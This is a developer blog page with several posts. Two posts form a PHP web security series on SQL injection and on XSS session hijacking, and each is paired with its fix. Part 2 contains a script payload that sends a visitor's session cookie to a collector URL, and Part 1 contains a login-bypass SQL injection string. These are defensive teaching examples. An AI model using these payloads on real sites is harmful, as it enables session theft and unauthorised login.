Monday, January 2, 2017

Security in PHP web pages - Part 2

In the second part of this series of articles we will explore a forum-style message page to demonstrate a session hijacking attack.

First the page code is as follows:



Now the problem: the page input is not checked for potentially dangerous characters, so the page allows the execution of JavaScript.

In addition to small jokes that may be attempted, such as opening popups or redirecting the browser to other pages, the page is vulnerable to another type of attack that allows the session cookie to be captured and sent to another server. This is the kind of attack we are going to demonstrate here.

With the following code inserted in the message input box, the browser will try to load an image whose source is actually a PHP script that will receive the session cookie:

<script>document.write('<img src="http://localhost:8088/login/submitcookie.php?cookie='+escape(document.cookie)+'"/>');</script>

The PHP code that will capture the cookie is as follows:



In this case the code creates a text file with the value of the cookie, so the user's current session can be captured simply by injecting this cookie into the attacker's browser.

To make the page safe it is necessary to validate the input; for this we can create a function:
function test_input($data) {
    $data = trim($data);             // remove leading and trailing whitespace
    $data = stripslashes($data);     // remove backslashes added by escaping
    $data = htmlspecialchars($data); // encode <, >, & and quotes so tags are not interpreted
    return $data;
}
(code from www.w3schools.com)

Of course we should also use prepared statements with bound parameters instead of concatenated strings for SQL code.




Tuesday, December 27, 2016

Security in PHP web pages

One concern that every web developer must keep in mind is the security of their products.

In this article we start a series of articles which will explore some basic security issues related to injecting SQL statements into web forms or URL parameters.

Examples of code with security issues and how to avoid them are presented.

So let's start with a simple login form implemented with the following code:




In this example, the code checks whether more than one database record has been returned and, if so, assumes that the credentials provided are correct.

The biggest mistake is concatenating the values received from the form into the SQL statement, which allows the user to manipulate the instruction at will.

Regardless of the user name entered, typing the following text in the password field is enough for the page to report a successful login: o' or 1=1 #

With this text the SQL statement will always return a record, because 1 equals 1. The # at the end causes the rest of the statement to be ignored, since it is the comment symbol in MySQL.

The solution to this problem is to use parameters, preparing the statement before executing it. The following code resolves the problem:
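As an added example (not this post's own code), here is the login check written first with string concatenation and then as a prepared statement, together with the output encoding that neutralises the script payload from Part 2 at the top of the page. The PDO connection details, the users table with its username and password columns, and the POST field names are assumptions.

```php
<?php
// Added example, not the post's own code. Connection details and the
// users table (columns username, password) are assumed placeholders.

function connect(): PDO {
    $pdo = new PDO('mysql:host=localhost;dbname=appdb;charset=utf8mb4', 'appuser', 'apppass');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Ask MySQL for real server-side prepared statements instead of
    // client-side emulation, so bound values can never alter the query text.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $pdo;
}

// Part 1, vulnerable: with the password "o' or 1=1 #" the WHERE clause
// becomes  ... AND password = 'o' or 1=1 #'  which is true for every row,
// so a record is always returned and the login is reported as successful.
function loginConcatenated(PDO $pdo, string $user, string $pass): bool {
    $sql = "SELECT id FROM users WHERE username = '$user' AND password = '$pass'";
    return $pdo->query($sql)->fetch() !== false;
}

// Part 1, fixed: the statement is prepared first and the values are bound
// as parameters, so the quote and the # travel as data and are compared
// literally against the stored columns; the same input now matches nothing.
// (The plain-text comparison mirrors the post; real code would fetch the
// stored hash and check it with password_verify().)
function loginPrepared(PDO $pdo, string $user, string $pass): bool {
    $stmt = $pdo->prepare('SELECT id FROM users WHERE username = ? AND password = ?');
    $stmt->execute([$user, $pass]);
    return $stmt->fetch() !== false;
}

// Part 2, fixed: encode a stored message before writing it into the page.
// The <script>...</script> payload from Part 2 comes out as visible text
// ("&lt;script&gt;...") instead of being executed by the browser.
function renderMessage(string $message): string {
    return htmlspecialchars(trim($message), ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage sketch for a login form handler.
$pdo = connect();
$user = $_POST['username'] ?? '';
$pass = $_POST['password'] ?? '';
if (loginPrepared($pdo, $user, $pass)) {
    echo 'Welcome, ' . renderMessage($user);
} else {
    echo 'Login failed';
}
```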





Tuesday, June 14, 2016

Google OAuth 2.0 in ASPX

In this post I will demonstrate how to use Google OAuth in an ASPX web form with C#.

This project uses Visual Studio 2015 and offers one option for the user to sign up and another to check the sign-in.

Let's start by creating a new project.

PacMan 3D

In this post we will be making a simple and classic game, the Pacman, with Unity 3D.

Let's create a new project.


Monday, April 4, 2016

Entity Framework

This post is about Entity Framework and how to use it to build, almost with a single mouse click, the CRUD (create, read, update and delete) operations over a table.

Let's start by creating a web MVC project with Visual Studio 2015.




Friday, March 25, 2016

Mobile == Optimization

Going mobile is not easy, so you must consider it from the beginning.

So I decided to develop a new project for mobile devices and, having a simple structure working, I started looking at the frame rate and, surprise surprise, it looked bad. I mean it was 6 to 8 frames per second and the scene was almost empty.

Then I looked into the bag of optimizations and started the kung fu:
- first simplify the models: fewer vertices, fewer faces and fewer edges all lead to faster rendering;
- change the Unity shaders to their mobile versions;
- I'm using a terrain, so looking at its options I started messing with these:
  - pixel error;
  - base map distance;
  - detail distance;
- there's one directional light in the scene, so here's what I changed:
  - baking to baked;
  - shadows to hard shadows;

In the scripts I looked at:
- string concatenation: do it with StringBuilder;
- function calls can sometimes be avoided;
- some functions can be optimized, like Mathf.Abs, which I replaced with x = (x > 0 ? x : -x).

After all these tricks I get 20 frames per second, not bad! And the frame rate is stable, not dropping as I add more elements to the scene.

There are some more changes that I'm going to test with the physics engine but for now I'm happy.